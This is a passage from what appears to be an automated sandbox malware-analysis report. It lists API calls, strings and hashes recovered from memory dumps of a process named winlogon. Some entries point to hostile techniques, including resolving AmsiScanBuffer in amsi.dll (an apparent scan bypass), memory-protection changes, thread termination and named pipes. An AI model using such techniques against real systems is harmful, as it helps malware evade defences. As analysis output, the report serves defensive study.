StrCpyW.SHLWAPI ref: 000002E991781AA2
CloseHandle.KERNEL32 ref: 000002E991781AB0

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: aadd3f8e96d0b8550f2f4e0aee76a5c4c79e6b4e38a5d3b3a6f34917246a207f
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 08016D21740B9286EB10DB23E898359A3A1F788FC5F49413B9E4E43755DE3CC589CBA0

Function 000002E991753E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002E991753AAC), ref: 000002E991753E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991753AAC), ref: 000002E991753E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002E991753AAC), ref: 000002E991753E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991753AAC), ref: 000002E991753E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002E991753AAC), ref: 000002E991753E9F
TerminateThread.KERNEL32(?,?,?,?,?,000002E991753AAC), ref: 000002E991753EAE

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 3b81aa958ff413cfa8e5ec496202203acca77d3b2fa95da1e903ea01d678b2ed
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 02012965351B8282FB249B63E84C71973A4BB48BC5F15002ECA4E463A6EF3DC488DB61

Function 000002E991783E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002E991783AAC), ref: 000002E991783E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991783AAC), ref: 000002E991783E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002E991783AAC), ref: 000002E991783E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991783AAC), ref: 000002E991783E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002E991783AAC), ref: 000002E991783E9F
TerminateThread.KERNEL32(?,?,?,?,?,000002E991783AAC), ref: 000002E991783EAE

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 73c2018ef39db80a5f6972731dfa494449b502553b15937f075091f61a90e3d3
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 8F012D6535179282FB249B2BE85D71573A1BB48B86F15002FC94D063A6EF3DC188CB20

Function 000002E991751AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002E991751AF4
StrCmpNIW.SHLWAPI ref: 000002E991751B0E
lstrlenW.KERNEL32 ref: 000002E991751B1D
StrCpyW.SHLWAPI ref: 000002E991751B32

Strings

\\?\, xrefs: 000002E991751B02

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: d4a347fda05ee2ec315dd7a066c065807b91727e5b562d1780f4fc0e84db1b32
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 47F062623446C692EB308F22F5CC3596361F744BC9FC5402ADA498695ADF7CC6C8CF20

Function 000002E991781AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002E991781AF4
StrCmpNIW.SHLWAPI ref: 000002E991781B0E
lstrlenW.KERNEL32 ref: 000002E991781B1D
StrCpyW.SHLWAPI ref: 000002E991781B32

Strings

\\?\, xrefs: 000002E991781B02

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: eb5ff2c951a5bae482f9afec4dfae658f0f6c27fa77660efb834e5cefa4e4125
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 1EF0C2623446C692FB208B22F4C83596761F744B89FC5412BCA4D4295ADF7CC6CCCF20

Function 000002E991753708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000002E99175275A), ref: 000002E99175372A
StrCpyW.SHLWAPI ref: 000002E99175373A
StrCatW.SHLWAPI ref: 000002E991753746
PathCombineW.SHLWAPI(?,?,00000000,000002E99175275A), ref: 000002E991753754

Strings

\\.\pipe\, xrefs: 000002E991753720

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: d6115707d6aef9e693d2db8f6a02cca2a5f11f351de9235fc31a88dc035036b6
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 91F0A764744BC282EA148B13FD5C1196260FB48FC4F458037EE1A87B2ADF3CC4C58B21

Function 000002E99175B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002E99175B929
GetProcAddress.KERNEL32 ref: 000002E99175B93F
FreeLibrary.KERNEL32 ref: 000002E99175B95B

Strings

mscoree.dll, xrefs: 000002E99175B920
CorExitProcess, xrefs: 000002E99175B938

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: ff0e80ec2ea6d149adea14970e351b468f08ed8edd75788b206b99ba77f6249f
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: ADF0966134468281EA108B26E88C3695331FB497E0F95021EDA69865E6DF3CC4C8CB21

Function 000002E991783708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000002E99178275A), ref: 000002E99178372A
StrCpyW.SHLWAPI ref: 000002E99178373A
StrCatW.SHLWAPI ref: 000002E991783746
PathCombineW.SHLWAPI(?,?,00000000,000002E99178275A), ref: 000002E991783754

Strings

\\.\pipe\, xrefs: 000002E991783720

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: c3fba989d3157824e95eb0131d30ebd2c2b0100f61e071794293bd0bcb81d083
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 1AF08264344BD291FA049B17F9581196360BB48FC6F458037EE1E47B1ACE2CC4C98B20

Function 000002E99178B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002E99178B929
GetProcAddress.KERNEL32 ref: 000002E99178B93F
FreeLibrary.KERNEL32 ref: 000002E99178B95B

Strings

CorExitProcess, xrefs: 000002E99178B938
mscoree.dll, xrefs: 000002E99178B920

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 949ca7e6ec979fc2a5cf465ec948dfa1051e8999589d5deae6457db39b19937b
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: F3F0966134468281FA108B25D88D3591320FB497A1F95031FDA6D461E6DF2CC4CCCB20

Function 000002E991781E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000002E991781E47
GetProcAddress.KERNEL32 ref: 000002E991781E57
Sleep.KERNEL32 ref: 000002E991781E67

Strings

amsi.dll, xrefs: 000002E991781E40
AmsiScanBuffer, xrefs: 000002E991781E50

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: ce6394d4e44f068df84350fd0878b21049811728e1f42b05845d703d061999ab
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 27D067506916D2D5FA086B27E89D3642262BB68B03FD6045FC50E052A2DE2C85DDCB70

Function 000002E991785810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002E991785896

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 905d22ae79c84e42d4d8527ec3c40c0e9e586524a5fdd5434e08fc97ebc96079
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 7B02E732259BC586E7A0CB56E49835AB7B0F3C4794F11415BEA8E87BA9DB7CC484CF10

Function 000002E991782C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000002E991782CAD
TlsGetValue.KERNEL32 ref: 000002E991782CBC
TlsGetValue.KERNEL32 ref: 000002E991782CCB
TlsSetValue.KERNEL32 ref: 000002E991782E0F
TlsSetValue.KERNEL32 ref: 000002E991782E1E
TlsSetValue.KERNEL32 ref: 000002E991782E2D

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: efc5a291f633b6cec668ad152656bef100cab3faa8e395eb72ffee173350b227
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 1451AE3524469287F364CF17E488A5AB7A0F788B81F52415F9E4A43B96DB38C9C5CF60

Function 000002E991752AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000002E991752AE1
TlsGetValue.KERNEL32 ref: 000002E991752AF0
TlsGetValue.KERNEL32 ref: 000002E991752AFF
TlsSetValue.KERNEL32 ref: 000002E991752C3B
TlsSetValue.KERNEL32 ref: 000002E991752C4A
TlsSetValue.KERNEL32 ref: 000002E991752C59

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: e98ddb78df2c4db77b958ecbb1f9d3a2bb0208d9d2e59975f59b075a0fa9858d
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 0B518F36754682C7E724DF67E84862AB3A5F788B84F52411EDE4A43756EF38C886CF10

Function 000002E991782AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000002E991782AE1
TlsGetValue.KERNEL32 ref: 000002E991782AF0
TlsGetValue.KERNEL32 ref: 000002E991782AFF
TlsSetValue.KERNEL32 ref: 000002E991782C3B
TlsSetValue.KERNEL32 ref: 000002E991782C4A
TlsSetValue.KERNEL32 ref: 000002E991782C59

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 65822839812e52c29eb79abd1652f2b94bd4da43e61eb925813e3cd2f3eb676f
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 0451923525469287F724CF17E88862AB7A0F788B85F52415FDE4A43756EF38C985CF10

Function 000002E991755E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002E991755E66

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
Instruction ID: 0c98546ec25a6069360e9145e9579234ee5df5f422805e35053f171e0809072b
Opcode Fuzzy Hash: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
Instruction Fuzzy Hash: 3861C636169B85C7EB60CB16E45872AB7E4F388744F51011AFA8D87BAADB7CC580CF10

Function 000002E991785E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002E991785E66

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 5234b59811223bd2deff02aec751b4bcb925e1f09013028f97830a5a62a14f1b
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 4861D536568A8186F760CB16E58871AB7B0F388784F51055BFA8E47BAADB7CC580CF10

Function 000002E991783EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002E991783A5B), ref: 000002E991783EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991783A5B), ref: 000002E991783F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002E991783A5B), ref: 000002E991783F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991783A5B), ref: 000002E991783F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002E991783A5B), ref: 000002E991783F68

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: b94f7e42cbb31fede1bc303a79be398a8fa66e254d5e631259a74597b8976633
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: F711462674578193FF248F26E4482196770F744B81F05402BEE8D03795EB7DC594CBA4

Function 000002E991758CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E991758CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000002E991758D62
RtlUnwindEx.NTDLL ref: 000002E991758DBC

Strings

csm, xrefs: 000002E991758D49

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
